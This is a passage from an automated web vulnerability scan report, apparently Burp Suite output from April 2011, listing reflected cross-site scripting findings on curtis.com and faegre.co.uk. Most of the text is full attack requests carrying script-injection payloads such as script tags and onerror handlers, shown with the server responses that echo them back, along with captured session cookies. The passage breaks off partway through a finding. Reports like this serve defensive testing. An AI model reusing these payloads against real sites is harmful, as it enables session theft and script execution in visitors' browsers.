This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%224fd71"><img%20src%3da%20onerror%3dalert(1)>d7938553f63&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="/emailprofessional.cfm?itemID=" onmouseover=prompt(937974) bad="4fd71"><img src=a onerror=alert(1)>d7938553f63&itemType=1&itemname=Curtis%2C%20Mallet%2DPrevost%2C%20Colt%20%26%20Mosle%20LLP%2E">
...[SNIP]...
4.32. http://www.curtis.com/emaildisclaimer.cfm [itemType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The value of the itemType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 228cb"><img%20src%3da%20onerror%3dalert(1)>f1b6cb07108 was submitted in the itemType parameter. This input was echoed as 228cb"><img src=a onerror=alert(1)>f1b6cb07108 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1228cb"><img%20src%3da%20onerror%3dalert(1)>f1b6cb07108 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="/emailprofessional.cfm?itemID=" onmouseover=prompt(937974) bad="&itemType=1228cb"><img src=a onerror=alert(1)>f1b6cb07108&itemname=Curtis%2C%20Mallet%2DPrevost%2C%20Colt%20%26%20Mosle%20LLP%2E">
...[SNIP]...
4.33. http://www.curtis.com/sitecontent.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba4dc"><a>a6169c51459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitecontent.cfm?pageID=64&ba4dc"><a>a6169c51459=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 16:56:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="/emailpage.cfm?pageID=64&ba4dc"><a>a6169c51459=1" class="nyroModal" target="_blank">
...[SNIP]...
4.34. http://www.faegre.co.uk/11572 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /11572

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 35c7f'a%3d'b'953088322e8 was submitted in the REST URL parameter 1. This input was echoed as 35c7f'a='b'953088322e8 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /1157235c7f'a%3d'b'953088322e8 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/eventtypes
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ScreenWidth=1920; ScreenHeight=1200; __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.2.10.1303088795

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21795


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/1157235c7f'a='b'953088322e8&Language=1' class='printhide'>
...[SNIP]...
4.35. http://www.faegre.co.uk/11572 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /11572

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e60a4"><script>alert(1)</script>8aeed5db901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11572?e60a4"><script>alert(1)</script>8aeed5db901=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/eventtypes
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ScreenWidth=1920; ScreenHeight=1200; __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.2.10.1303088795

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:42 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 35630


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/11572?e60a4"><script>alert(1)</script>8aeed5db901=1"/>
...[SNIP]...
4.36. http://www.faegre.co.uk/59 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /59

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fff2'a%3d'b'92ec575172b was submitted in the REST URL parameter 1. This input was echoed as 8fff2'a='b'92ec575172b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /598fff2'a%3d'b'92ec575172b HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 18 Apr 2011 01:53:04 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21696


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/598fff2'a='b'92ec575172b&Language=1' class='printhide'>
...[SNIP]...
4.37. http://www.faegre.co.uk/59 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /59

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88881'><script>alert(1)</script>0f8a8e3ba08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /59?88881'><script>alert(1)</script>0f8a8e3ba08=1 HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:52:35 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 38198


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='http://www.faegre.co.uk/showlocation.aspx?show=59&88881'><script>alert(1)</script>0f8a8e3ba08=1&PrintPage=True'>
...[SNIP]...
4.38. http://www.faegre.co.uk/59 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /59

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9fcc"><script>alert(1)</script>62920d69250 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /59?c9fcc"><script>alert(1)</script>62920d69250=1 HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:52:32 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 38222


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/59?c9fcc"><script>alert(1)</script>62920d69250=1"/>
...[SNIP]...
4.39. http://www.faegre.co.uk/bios [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /bios

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 30595'a%3d'b'ddd78dd2b5a was submitted in the REST URL parameter 1. This input was echoed as 30595'a='b'ddd78dd2b5a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bios30595'a%3d'b'ddd78dd2b5a HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 18 Apr 2011 01:52:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21710


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/bios30595'a='b'ddd78dd2b5a&Language=1' class='printhide'>
...[SNIP]...
4.40. http://www.faegre.co.uk/bios [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /bios

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca48"><script>alert(1)</script>0c9a111c97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bios?1ca48"><script>alert(1)</script>0c9a111c97b=1 HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:52:09 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 70750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/bios?1ca48"><script>alert(1)</script>0c9a111c97b=1"/>
...[SNIP]...
4.41. http://www.faegre.co.uk/community [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /community

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abdd5'a%3d'b'a497da70a was submitted in the REST URL parameter 1. This input was echoed as abdd5'a='b'a497da70a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /communityabdd5'a%3d'b'a497da70a HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/eventtypes
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ScreenWidth=1920; ScreenHeight=1200; __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.2.10.1303088795

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:56 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/communityabdd5'a='b'a497da70a&Language=1' class='printhide'>
...[SNIP]...
4.42. http://www.faegre.co.uk/community [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdfed"><script>alert(1)</script>c2001057615 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community?fdfed"><script>alert(1)</script>c2001057615=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/eventtypes
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ScreenWidth=1920; ScreenHeight=1200; __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.2.10.1303088795

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 28539


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/community?fdfed"><script>alert(1)</script>c2001057615=1"/>
...[SNIP]...
4.43. http://www.faegre.co.uk/eventtypes [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /eventtypes

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b070f'a%3d'b'61e266f8c27 was submitted in the REST URL parameter 1. This input was echoed as b070f'a='b'61e266f8c27 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /eventtypesb070f'a%3d'b'61e266f8c27 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/showlocation.aspx?Show=59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920; ScreenHeight=1200; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.1.10.1303088795

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21830


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/eventtypesb070f'a='b'61e266f8c27&Language=1' class='printhide'>
...[SNIP]...
4.44. http://www.faegre.co.uk/eventtypes [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /eventtypes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b46e6"><script>alert(1)</script>19517a7f7c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /eventtypes?b46e6"><script>alert(1)</script>19517a7f7c3=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/showlocation.aspx?Show=59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920; ScreenHeight=1200; __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; __utmc=57823037; __utmb=57823037.1.10.1303088795

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:10:35 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 25201


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/eventtypes?b46e6"><script>alert(1)</script>19517a7f7c3=1"/>
...[SNIP]...
4.45. http://www.faegre.co.uk/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7323a'a%3d'b'9d27131e28e was submitted in the REST URL parameter 1. This input was echoed as 7323a'a='b'9d27131e28e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

